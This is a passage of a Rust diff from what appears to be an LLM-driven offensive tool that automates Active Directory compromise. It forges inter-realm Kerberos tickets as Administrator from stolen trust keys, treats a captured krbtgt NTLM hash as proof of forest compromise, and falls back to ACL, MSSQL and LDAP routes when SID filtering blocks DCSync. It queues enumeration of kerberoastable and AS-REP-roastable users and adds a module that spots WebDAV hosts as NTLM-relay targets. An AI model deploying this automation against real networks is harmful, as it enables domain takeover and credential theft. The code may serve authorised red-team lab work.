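//       discoveries
//           .and_then(|d| d.get("hashes"))
//           .and_then(|h| h.as_array())
//           .map(|hashes| {
//               hashes.iter().any(|h| {
//                   let get = |k| h.get(k).and_then(|v| v.as_str()).unwrap_or("");
//                   get("username").eq_ignore_ascii_case("krbtgt")
//                       && get("domain").to_lowercase() == target
//                       && get("hash_type").eq_ignore_ascii_case("ntlm")
//               })
//           })
//           .unwrap_or(false)
//   }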
+ let target_lower = target_domain_bg.to_lowercase(); + let has_target_krbtgt = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("hashes")) + .and_then(|h| h.as_array()) + .map(|hashes| { + hashes.iter().any(|h| { + let user = + h.get("username").and_then(|v| v.as_str()).unwrap_or(""); + let dom = + h.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + let htype = + h.get("hash_type").and_then(|v| v.as_str()).unwrap_or(""); + user.eq_ignore_ascii_case("krbtgt") + && dom.to_lowercase() == target_lower + && htype.eq_ignore_ascii_case("ntlm") + }) + }) + .unwrap_or(false); + if has_target_krbtgt { + info!( + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + "Cross-forest forge compromised target — marking exploited" + ); + let _ = dispatcher_bg + .state + .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg) + .await; + let techniques = vec!["T1134.005".to_string(), "T1550.003".to_string()]; + let event_id = format!( + "evt-trust-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "trust_automation", + "description": format!( + "Forest trust escalation: {} \u{2192} {} via trust key {}", + source_domain_bg, target_domain_bg, trust_account_bg + ), + "mitre_techniques": techniques, + }); + let _ = dispatcher_bg + .state + .persist_timeline_event(&dispatcher_bg.queue, &event, &techniques) + .await; + } else { + // Tool ran cleanly but no target krbtgt landed in + // discoveries — this is a deterministic failure + // (SID filtering, denied permissions, or wrong + // forest) that won't change on the next 30s tick. + // Keep dedup MARKED so we don't relitigate the + // doomed forge in a tight loop, leave the trust + // vuln unmarked (only observed target krbtgt + // proves compromise), and wake the cross-forest + // fallback paths (ACL/MSSQL/FSP) which can still + // compromise the target forest without ExtraSid. + // + // Surface tool stdout tail + a hash-count summary so + // post-mortem can distinguish silent nxc failure + // (empty output) from auth-denied (nxc printed + // STATUS_LOGON_FAILURE / rpc_s_access_denied) from + // partial dumps (got hashes but no krbtgt — usually + // a cross-forest no-ExtraSid case where the target + // KDC issued a TGS but DRSUAPI rejected replication). + let tail: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::<String>() + .chars() + .rev() + .collect(); + let hash_count = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("hashes")) + .and_then(|h| h.as_array()) + .map(|a| a.len()) + .unwrap_or(0); + warn!( + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + hash_count, + output_tail = %tail, + "forge_inter_realm_and_dump completed but no target krbtgt observed — locking dedup, waking fallbacks (vuln NOT marked exploited; only target krbtgt capture proves compromise)" + ); + let _ = vuln_id_bg; // intentionally unused — see comment above + + // Dump-phase failure (SID filtering missed by + // is_filtered_inter_forest_trust, DRSUAPI denial + // despite a valid TGS, or any other reason DCSync + // returned 0 hashes) leaves the foreign forest + // attackable via Kerberos LDAP bind. Dispatch + // create_inter_realm_ticket so downstream tools + // (bloodyad -k, etc.) get a usable ccache.
Without + // this, wake_cross_forest_fallbacks below is a + // no-op when no same-realm credential bound the + // ACL/foreign-group/cross-forest enums to the + // target — the case that left fabrikam.local + // permanently un-attackable in op-20260502-013857. + { + let dispatcher_fb = dispatcher_bg.clone(); + let source_domain_fb = source_domain_bg.clone(); + let target_domain_fb = target_domain_bg.clone(); + let trust_key_fb = trust_key_bg.clone(); + let aes_key_fb = aes_key_bg.clone(); + let source_domain_sid_fb = source_domain_sid_bg.clone(); + tokio::spawn(async move { + dispatch_create_inter_realm_ticket( + &dispatcher_fb, + &source_domain_fb, + &target_domain_fb, + &trust_key_fb, + aes_key_fb.as_deref(), + source_domain_sid_fb.as_deref(), + ) + .await; + }); + } + + wake_cross_forest_fallbacks(&dispatcher_bg, &target_domain_bg).await; + } + } + Err(e) => { + warn!( + err = %e, + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + "forge_inter_realm_and_dump dispatch errored — clearing dedup for retry" + ); + clear_dedup().await; + } + } + }); } } } @@ -812,7 +2030,311 @@ struct TrustFollowWork { target_dc_ip: Option<String>, source_domain_sid: Option<String>, target_domain_sid: Option<String>, - source_dc_ip: Option<String>, +} + +/// Submit a cross-forest user-enumeration recon task immediately after a +/// successful inter-realm ticket forge. +/// +/// Without this, `auto_cross_forest_enum` would refuse to dispatch (its +/// `best_cred` returns None when the target forest has no credentials in +/// state) and the freshly-forged ticket would sit idle. This helper queues +/// the same `ldap_user_enumeration` recon payload using any usable +/// source-domain credential as a placeholder; the credential resolver +/// detects the cross-forest LDAP tool, finds no NTLM hash for the target, +/// and injects the inter-realm ccache via `resolve_cross_forest_ticket`. +async fn dispatch_post_ticket_user_enumeration( + dispatcher: &Dispatcher, + source_domain: &str, + target_domain: &str, +) { + let target_lower = target_domain.to_lowercase(); + + let (target_dc_ip, target_dc_fqdn, source_cred) = { + let s = dispatcher.state.read().await; + let Some(dc_ip) = s.resolve_dc_ip(target_domain) else { + warn!( + source_domain, + target_domain, "post-ticket user-enum skipped: no DC IP for target domain" + ); + return; + }; + let dc_fqdn = s + .hosts + .iter() + .find(|h| h.ip == dc_ip && !h.hostname.is_empty()) + .map(|h| { + let hn = h.hostname.to_lowercase(); + if hn.ends_with(&format!(".{target_lower}")) || hn == target_lower { + hn + } else { + format!("{hn}.{target_lower}") + } + }); + // Pick any non-empty-password credential from the source forest. The + // resolver will swap the cred for the ticket; what matters is that + // bind_domain ends up != target_domain so the cross-forest path is + // taken. We accept child-domain creds (e.g. child.contoso.local + // when source is contoso.local) because intermediate ops often + // only own the child realm — the trust key extraction still uses the + // parent's outbound trust, but state.credentials only holds the + // identities we cracked along the way.
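// [Illustrative example — not part of the patch.] Per is_domain_related's
// contract (exact, child, or parent), a contoso.local source forest
// accepts all of:
//
//   is_domain_related("contoso.local", "contoso.local")        // exact
//   is_domain_related("child.contoso.local", "contoso.local")  // child
//   is_domain_related("contoso.local", "child.contoso.local")  // parent
//
// while ("fabrikam.local", "contoso.local") — a foreign forest — is
// rejected, which is exactly the cross-forest case the injected
// inter-realm ticket has to cover instead.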
+ let cred = s + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && is_domain_related(&c.domain, source_domain) + && !s.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + (dc_ip, dc_fqdn, cred) + }; + + let Some(cred) = source_cred else { + warn!( + source_domain, + target_domain, + "post-ticket user-enum skipped: no source-domain credential to seed the task" + ); + return; + }; + + let target = target_dc_fqdn.unwrap_or_else(|| target_dc_ip.clone()); + + let payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": target, + "domain": target_domain, + "bind_domain": source_domain, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": [ + "sAMAccountName", "description", "memberOf", + "userAccountControl", "servicePrincipalName", + "msDS-AllowedToDelegateTo", "adminCount" + ], + "cross_forest": true, + "instructions": concat!( + "Cross-forest user enumeration after inter-realm Kerberos ticket forge. ", + "An inter-realm ccache for this target domain has been pre-cached and ", + "will be auto-injected by the credential resolver. Use ", + "`ldap_search_descriptions` (or `ldap_search`) against the target DC ", + "FQDN — these tools perform GSSAPI bind with the injected ticket. Do ", + "NOT use the supplied password credential for the bind (it is from a ", + "different forest and will be rejected); the ticket handles auth.\n\n", + "Report every user found with EXACTLY this JSON format in ", + "discovered_users:\n", + " {\"username\": \"samaccountname\", \"domain\": \"target.domain\", ", + "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\"]}\n", + "Flag DoesNotRequirePreAuth as vuln_type='asrep_roastable' and SPNs as ", + "vuln_type='kerberoastable'." + ), + }); + + let priority = dispatcher.effective_priority("cross_forest_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + source_domain, + target_domain, + target_dc = %target, + "Post-ticket cross-forest user enumeration dispatched" + ); + } + Ok(None) => { + debug!( + source_domain, + target_domain, "Post-ticket user-enum deferred by throttling" + ); + } + Err(e) => { + warn!( + err = %e, + source_domain, + target_domain, + "Failed to submit post-ticket user-enum task" + ); + } + } +} + +/// Forge an inter-realm Kerberos ticket for a SID-filtered cross-forest trust. +/// +/// Called from the suppression branch of `auto_trust_follow` when +/// `is_filtered_inter_forest_trust` is true. The ExtraSid DCSync path is +/// blocked by SID filtering, but a plain inter-realm TGT is still useful: +/// bloodyad with `-k` can perform Kerberos LDAP bind against the target DC +/// as Administrator, enabling password resets and group membership changes. +/// +/// The ticket is written to `/tmp/ares-tickets/____.ccache` +/// (a shared path accessible to all workers on the same host) and persisted +/// to Redis via `publish_kerberos_ticket` so the credential resolver can +/// find it when bloodyad or other LDAP-bind tools target the foreign forest. +/// +/// SID resolution is opportunistic: if the source SID isn't in state yet, we +/// pass an empty string and ticketer will still produce a ticket (though some +/// KDCs reject it). This is best-effort — the fallback paths (ACL/MSSQL) are +/// the primary attack vectors; this ticket is just a bonus. 
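+///
+/// Illustrative chain (editor's sketch; realm and host names hypothetical):
+/// with the contoso.local -> fabrikam.local trust key, ticketer forges an
+/// inter-realm TGT for `Administrator` with service principal
+/// `krbtgt/FABRIKAM.LOCAL@CONTOSO.LOCAL`; the target KDC can then issue
+/// `ldap/dc01.fabrikam.local@FABRIKAM.LOCAL` from it, which is the cached
+/// service ticket that a GSSAPI LDAP bind actually consumes.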
+async fn dispatch_create_inter_realm_ticket(
+    dispatcher: &Dispatcher,
+    source_domain: &str,
+    target_domain: &str,
+    trust_key: &str,
+    aes_key: Option<&str>,
+    source_domain_sid: Option<&str>,
+) {
+    use ares_llm::ToolCall;
+
+    let ticket_username = "Administrator";
+
+    // Build tool args. source_sid is required by the tool — use a fallback
+    // empty string and let ticketer attempt the forge; worst case the KDC
+    // rejects it and the ticket write fails silently.
+    let source_sid = source_domain_sid.unwrap_or("");
+    if source_sid.is_empty() {
+        tracing::info!(
+            source_domain,
+            target_domain,
+            "dispatch_create_inter_realm_ticket: source SID unknown, attempting forge with empty SID"
+        );
+    }
+
+    let mut tool_args = serde_json::json!({
+        "trust_key": trust_key,
+        "source_sid": source_sid,
+        "source_domain": source_domain,
+        "target_domain": target_domain,
+        "username": ticket_username,
+    });
+    if let Some(aes) = aes_key {
+        tool_args["aes_key"] = serde_json::json!(aes);
+    }
+
+    // Look up the target DC so the tool can chain ldap/<dc_fqdn> +
+    // cifs/<dc_fqdn> service-ticket fetches into the same ccache. MIT
+    // GSSAPI clients can't walk a referral starting from
+    // `krbtgt/<target_domain>@<source_domain>`; they require the service
+    // ticket to already be cached. Without this, the forged inter-realm
+    // TGT is unusable for `ldapsearch -Y GSSAPI`.
+    {
+        let s = dispatcher.state.read().await;
+        let target_lower = target_domain.to_lowercase();
+        if let Some(dc_ip) = s.resolve_dc_ip(target_domain) {
+            let dc_fqdn = s.hosts.iter().find_map(|h| {
+                if h.ip != dc_ip || h.hostname.is_empty() {
+                    return None;
+                }
+                let hn = h.hostname.to_lowercase();
+                if hn.ends_with(&format!(".{target_lower}")) || hn == target_lower {
+                    Some(hn)
+                } else {
+                    Some(format!("{hn}.{target_lower}"))
+                }
+            });
+            if let Some(fqdn) = dc_fqdn {
+                tool_args["target_dc_ip"] = serde_json::json!(dc_ip);
+                tool_args["target_dc_fqdn"] = serde_json::json!(fqdn);
+            }
+        }
+    }
+
+    let call = ToolCall {
+        id: format!("create_inter_realm_{}", uuid::Uuid::new_v4().simple()),
+        name: "create_inter_realm_ticket".to_string(),
+        arguments: tool_args,
+    };
+    let task_id = format!(
+        "inter_realm_ticket_{}",
+        &uuid::Uuid::new_v4().simple().to_string()[..12]
+    );
+
+    tracing::info!(
+        source_domain,
+        target_domain,
+        task_id = %task_id,
+        args = %call.arguments,
+        "Dispatching create_inter_realm_ticket for SID-filtered trust (Kerberos LDAP path)"
+    );
+
+    match dispatcher
+        .llm_runner
+        .tool_dispatcher()
+        .dispatch_tool("privesc", &task_id, &call)
+        .await
+    {
+        Ok(result) => {
+            if result.error.is_some() {
+                tracing::warn!(
+                    source_domain,
+                    target_domain,
+                    error = ?result.error,
+                    "create_inter_realm_ticket returned error"
+                );
+                return;
+            }
+            // Parse the ticket path from the tool output (ARES_TICKET_PATH=<path>).
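+            // Editor's note: a successful run is expected to end with a line
+            // such as
+            //   ARES_TICKET_PATH=/tmp/ares-tickets/contoso_fabrikam.ccache
+            // (the path shown is hypothetical; only the `ARES_TICKET_PATH=`
+            // prefix contract matters to the parsing below).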
+            let ticket_path = result
+                .output
+                .lines()
+                .find_map(|line| line.strip_prefix("ARES_TICKET_PATH="))
+                .map(str::trim)
+                .filter(|p| !p.is_empty())
+                .map(str::to_string);
+
+            let Some(ticket_path) = ticket_path else {
+                tracing::warn!(
+                    source_domain,
+                    target_domain,
+                    "create_inter_realm_ticket succeeded but no ARES_TICKET_PATH in output"
+                );
+                return;
+            };
+
+            tracing::info!(
+                source_domain,
+                target_domain,
+                ticket_path = %ticket_path,
+                output_tail = %result.output.lines().rev().take(20).collect::<Vec<_>>().into_iter().rev().collect::<Vec<_>>().join(" | "),
+                "Inter-realm ticket forged — persisting for Kerberos LDAP tools"
+            );
+
+            let ticket = ares_core::models::KerberosTicket {
+                source_domain: source_domain.to_string(),
+                target_domain: target_domain.to_string(),
+                username: ticket_username.to_string(),
+                ticket_path,
+                forged_at: Some(chrono::Utc::now()),
+            };
+            let _ = dispatcher
+                .state
+                .publish_kerberos_ticket(&dispatcher.queue, ticket)
+                .await;
+
+            // Without a follow-up dispatch the ticket sits idle: the foreign
+            // forest has no credentials in state, so `auto_cross_forest_enum`
+            // skips it (best_cred returns None), and no LDAP-bind tool ever
+            // runs against the target DC. Kick off a cross-forest user-enum
+            // task here so the credential resolver injects the freshly-forged
+            // ticket and `ldap_search`/`ldap_search_descriptions` actually
+            // populates `state.users` for the target domain.
+            dispatch_post_ticket_user_enumeration(dispatcher, source_domain, target_domain).await;
+        }
+        Err(e) => {
+            tracing::warn!(
+                source_domain,
+                target_domain,
+                err = %e,
+                "create_inter_realm_ticket dispatch error"
+            );
+        }
+    }
+}
 
 #[cfg(test)]
@@ -958,4 +2480,114 @@ mod tests {
         assert_eq!(trust_enum_dedup_key("", false), "trust_enum:");
         assert_eq!(trust_enum_dedup_key("", true), "trust_enum_hash:");
     }
+
+    // is_filtered_inter_forest_trust
+
+    fn state_with_trust(domain: &str, trust: ares_core::models::TrustInfo) -> StateInner {
+        let mut s = StateInner::new("op-test".into());
+        s.trusted_domains.insert(domain.to_lowercase(), trust);
+        s
+    }
+
+    #[test]
+    fn filtered_inter_forest_intra_forest_returns_false() {
+        let s = StateInner::new("op-test".into());
+        // child↔parent — not inter-forest, never filtered.
+        assert!(!is_filtered_inter_forest_trust(
+            &s,
+            "child.contoso.local",
+            "contoso.local"
+        ));
+    }
+
+    #[test]
+    fn filtered_inter_forest_explicit_filtering_on() {
+        let trust = ares_core::models::TrustInfo {
+            domain: "fabrikam.local".into(),
+            flat_name: "FABRIKAM".into(),
+            direction: "bidirectional".into(),
+            trust_type: "forest".into(),
+            sid_filtering: true,
+        };
+        let s = state_with_trust("fabrikam.local", trust);
+        assert!(is_filtered_inter_forest_trust(
+            &s,
+            "contoso.local",
+            "fabrikam.local"
+        ));
+    }
+
+    #[test]
+    fn filtered_inter_forest_explicit_filtering_off() {
+        let trust = ares_core::models::TrustInfo {
+            domain: "fabrikam.local".into(),
+            flat_name: "FABRIKAM".into(),
+            direction: "bidirectional".into(),
+            trust_type: "forest".into(),
+            sid_filtering: false,
+        };
+        let s = state_with_trust("fabrikam.local", trust);
+        assert!(!is_filtered_inter_forest_trust(
+            &s,
+            "contoso.local",
+            "fabrikam.local"
+        ));
+    }
+
+    #[test]
+    fn filtered_inter_forest_no_metadata_tries_forge() {
+        let s = StateInner::new("op-test".into());
+        // No TrustInfo for the target. Without explicit filtering metadata we
+        // try the forge — the cost of an unnecessary attempt (~30s) is cheaper
+        // than silently dropping a valid attack on a misconfigured trust.
+ assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_ignores_unrelated_source_metadata() { + // Repro of op-20260429-111016 bug: child discovered its parent trust + // and stored TrustInfo{ domain="contoso.local", parent_child, + // sid_filtering=false }. Querying the unrelated cross-forest path + // contoso.local → fabrikam.local must NOT be answered with that + // parent_child entry (which would wrongly classify the cross-forest + // path as intra-forest). With no metadata for the actual target we + // now try the forge rather than silently suppressing it. + let parent_trust = ares_core::models::TrustInfo { + domain: "contoso.local".into(), + flat_name: "CONTOSO".into(), + direction: "bidirectional".into(), + trust_type: "parent_child".into(), + sid_filtering: false, + }; + let s = state_with_trust("contoso.local", parent_trust); + // Target fabrikam.local has no metadata — try the forge. + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_target_metadata_authoritative() { + // When the target's TrustInfo says cross-forest with SID filtering, + // suppress the forge regardless of any source-side parent_child entry. + let target_trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: true, + }; + let s = state_with_trust("fabrikam.local", target_trust); + assert!(is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } } diff --git a/ares-cli/src/orchestrator/automation/webdav_detection.rs b/ares-cli/src/orchestrator/automation/webdav_detection.rs new file mode 100644 index 00000000..f5e29c67 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/webdav_detection.rs @@ -0,0 +1,699 @@ +//! auto_webdav_detection -- detect WebDAV on hosts for NTLM relay. +//! +//! Hosts running WebClient service (WebDAV) accept HTTP-based NTLM auth, +//! which bypasses SMB signing requirements. This enables relay attacks +//! (HTTP→LDAP/SMB) even when SMB signing is enforced. WebDAV is commonly +//! enabled on IIS servers and member servers with WebClient service. +//! +//! This is a bridge module (like smb_signing.rs): it checks discovered hosts +//! for WebDAV indicators and registers `webdav_enabled` vulnerabilities +//! that downstream modules (ntlm_relay) can target. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::state::*; + +/// Collect WebDAV work items from state (pure logic, no async). 
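+///
+/// For example (mirroring the unit tests below): a non-DC host at
+/// 192.168.58.22 advertising `"80/tcp iis httpd"`, with at least one
+/// credential in state, yields a single `WebDavWork` with
+/// `dedup_key = "webdav:192.168.58.22"` and
+/// `vuln_id = "webdav_enabled_192_168_58_22"`.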
+fn collect_webdav_work(state: &StateInner) -> Vec<WebDavWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for host in &state.hosts {
+        // Skip DCs (WebDAV relay is for member servers)
+        if host.is_dc {
+            continue;
+        }
+
+        // Check if host has WebDAV indicators in services
+        let has_webdav = host.services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("webdav")
+                || sl.contains("webclient")
+                || sl.contains("iis")
+                || (sl.contains("80/") && sl.contains("http"))
+        });
+
+        if !has_webdav {
+            continue;
+        }
+
+        let dedup_key = format!("webdav:{}", host.ip);
+        if state.is_processed(DEDUP_WEBDAV_DETECTION, &dedup_key) {
+            continue;
+        }
+
+        // Check if vuln already registered
+        let vuln_id = format!("webdav_enabled_{}", host.ip.replace('.', "_"));
+        if state.discovered_vulnerabilities.contains_key(&vuln_id) {
+            continue;
+        }
+
+        let domain = host
+            .hostname
+            .find('.')
+            .map(|i| host.hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+            .or_else(|| state.credentials.first())
+            .cloned();
+
+        let cred = match cred {
+            Some(c) => c,
+            None => continue,
+        };
+
+        items.push(WebDavWork {
+            dedup_key,
+            vuln_id,
+            target_ip: host.ip.clone(),
+            hostname: host.hostname.clone(),
+            domain,
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+use crate::orchestrator::dispatcher::Dispatcher;
+
+/// Checks discovered hosts for WebDAV service and registers vulnerabilities.
+/// Interval: 45s.
+pub async fn auto_webdav_detection(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("webdav_detection") {
+            continue;
+        }
+
+        let work: Vec<WebDavWork> = {
+            let state = dispatcher.state.read().await;
+            collect_webdav_work(&state)
+        };
+
+        for item in work {
+            // Dispatch a recon task to verify WebDAV is accessible
+            let payload = json!({
+                "technique": "webdav_check",
+                "target_ip": item.target_ip,
+                "hostname": item.hostname,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("webdav_detection");
+            match dispatcher
+                .throttled_submit("recon", "recon", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        target = %item.target_ip,
+                        hostname = %item.hostname,
+                        "WebDAV detection check dispatched"
+                    );
+
+                    // Also register the vuln proactively (service tag is strong signal)
+                    let vuln = ares_core::models::VulnerabilityInfo {
+                        vuln_id: item.vuln_id,
+                        vuln_type: "webdav_enabled".to_string(),
+                        target: item.target_ip.clone(),
+                        discovered_by: "auto_webdav_detection".to_string(),
+                        discovered_at: chrono::Utc::now(),
+                        details: {
+                            let mut d = std::collections::HashMap::new();
+                            d.insert(
+                                "hostname".to_string(),
+                                serde_json::Value::String(item.hostname.clone()),
+                            );
+                            d.insert(
+                                "domain".to_string(),
+                                serde_json::Value::String(item.domain.clone()),
+                            );
+                            d.insert(
+                                "target_ip".to_string(),
+                                serde_json::Value::String(item.target_ip.clone()),
+                            );
+                            d
+                        },
+                        recommended_agent: "coercion".to_string(),
+                        priority: 4,
+                    };
+
+                    let _ = dispatcher
+                        .state
+                        .publish_vulnerability_with_strategy(
+                            &dispatcher.queue,
+                            vuln,
+                            Some(&dispatcher.config.strategy),
+                        )
+                        .await;
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_WEBDAV_DETECTION, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_WEBDAV_DETECTION, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(target = %item.target_ip, "WebDAV detection deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, target = %item.target_ip, "Failed to dispatch WebDAV detection");
+                }
+            }
+        }
+    }
+}
+
+struct WebDavWork {
+    dedup_key: String,
+    vuln_id: String,
+    target_ip: String,
+    hostname: String,
+    domain: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("webdav:{}", "192.168.58.22");
+        assert_eq!(key, "webdav:192.168.58.22");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_WEBDAV_DETECTION, "webdav_detection");
+    }
+
+    #[test]
+    fn webdav_service_detection_webdav() {
+        let services = ["80/tcp webdav".to_string()];
+        let has_webdav = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("webdav")
+                || sl.contains("webclient")
+                || sl.contains("iis")
+                || (sl.contains("80/") && sl.contains("http"))
+        });
+        assert!(has_webdav);
+    }
+
+    #[test]
+    fn webdav_service_detection_iis() {
+        let services = ["80/tcp iis httpd".to_string()];
+        let has_webdav = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("webdav")
+                || sl.contains("webclient")
+                || sl.contains("iis")
+                || (sl.contains("80/") && sl.contains("http"))
+        });
+        assert!(has_webdav);
+    }
+
+    #[test]
+    fn webdav_service_detection_http() {
+        let services = ["80/tcp http".to_string()];
+        let has_webdav = services.iter().any(|s| {
let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn no_webdav_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "3389/tcp ms-wbt-server".to_string(), + ]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + #[test] + fn vuln_id_format() { + let ip = "192.168.58.22"; + let vuln_id = format!("webdav_enabled_{}", ip.replace('.', "_")); + assert_eq!(vuln_id, "webdav_enabled_192_168_58_22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "web01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn webdav_service_detection_webclient() { + let services = ["WebClient service running".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_case_insensitive() { + let services = ["80/TCP WEBDAV".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_not_port_80_without_http() { + // Port 80 alone without "http" keyword should not match + let services = ["80/tcp other_service".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + #[test] + fn domain_from_hostname_bare() { + let hostname = "web01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn domain_from_hostname_subdomain() { + let hostname = "web01.child.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "child.contoso.local"); + } + + #[test] + fn vuln_id_format_various_ips() { + let ips = ["192.168.58.10", "192.168.58.22", "192.168.58.240"]; + for ip in ips { + let vuln_id = format!("webdav_enabled_{}", ip.replace('.', "_")); + assert!(vuln_id.starts_with("webdav_enabled_")); + assert!(!vuln_id.contains('.')); + } + } + + #[test] + fn credential_domain_matching() { + let domain = "contoso.local".to_string(); + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!(cred_domain.to_lowercase(), domain); + } + + #[test] + fn credential_domain_matching_empty_domain() { + let domain = "".to_string(); + let cred_domain = "contoso.local"; + // When domain is empty, the first branch should fail and fall through + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain; + assert!(!matches); + } + + #[test] + fn webdav_vuln_details_construction() { + let hostname = "web01.contoso.local".to_string(); + let domain = "contoso.local".to_string(); + let target_ip = "192.168.58.22".to_string(); + let mut d = 
std::collections::HashMap::new();
+        d.insert(
+            "hostname".to_string(),
+            serde_json::Value::String(hostname.clone()),
+        );
+        d.insert(
+            "domain".to_string(),
+            serde_json::Value::String(domain.clone()),
+        );
+        d.insert(
+            "target_ip".to_string(),
+            serde_json::Value::String(target_ip.clone()),
+        );
+        assert_eq!(d.len(), 3);
+        assert_eq!(d["hostname"], serde_json::json!("web01.contoso.local"));
+        assert_eq!(d["domain"], serde_json::json!("contoso.local"));
+        assert_eq!(d["target_ip"], serde_json::json!("192.168.58.22"));
+    }
+
+    #[test]
+    fn webdav_payload_structure() {
+        let payload = serde_json::json!({
+            "technique": "webdav_check",
+            "target_ip": "192.168.58.22",
+            "hostname": "web01.contoso.local",
+            "domain": "contoso.local",
+            "credential": {
+                "username": "admin",
+                "password": "P@ssw0rd!",
+                "domain": "contoso.local",
+            },
+        });
+        assert_eq!(payload["technique"], "webdav_check");
+        assert_eq!(payload["target_ip"], "192.168.58.22");
+        assert_eq!(payload["hostname"], "web01.contoso.local");
+        assert_eq!(payload["credential"]["username"], "admin");
+    }
+
+    #[test]
+    fn empty_services_no_webdav() {
+        let services: Vec<String> = vec![];
+        let has_webdav = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("webdav")
+                || sl.contains("webclient")
+                || sl.contains("iis")
+                || (sl.contains("80/") && sl.contains("http"))
+        });
+        assert!(!has_webdav);
+    }
+
+    // --- collect_webdav_work tests ---
+
+    use crate::orchestrator::state::StateInner;
+
+    fn make_host(
+        ip: &str,
+        hostname: &str,
+        is_dc: bool,
+        services: Vec<String>,
+    ) -> ares_core::models::Host {
+        ares_core::models::Host {
+            ip: ip.to_string(),
+            hostname: hostname.to_string(),
+            os: String::new(),
+            roles: Vec::new(),
+            services,
+            is_dc,
+            owned: false,
+        }
+    }
+
+    fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+        ares_core::models::Credential {
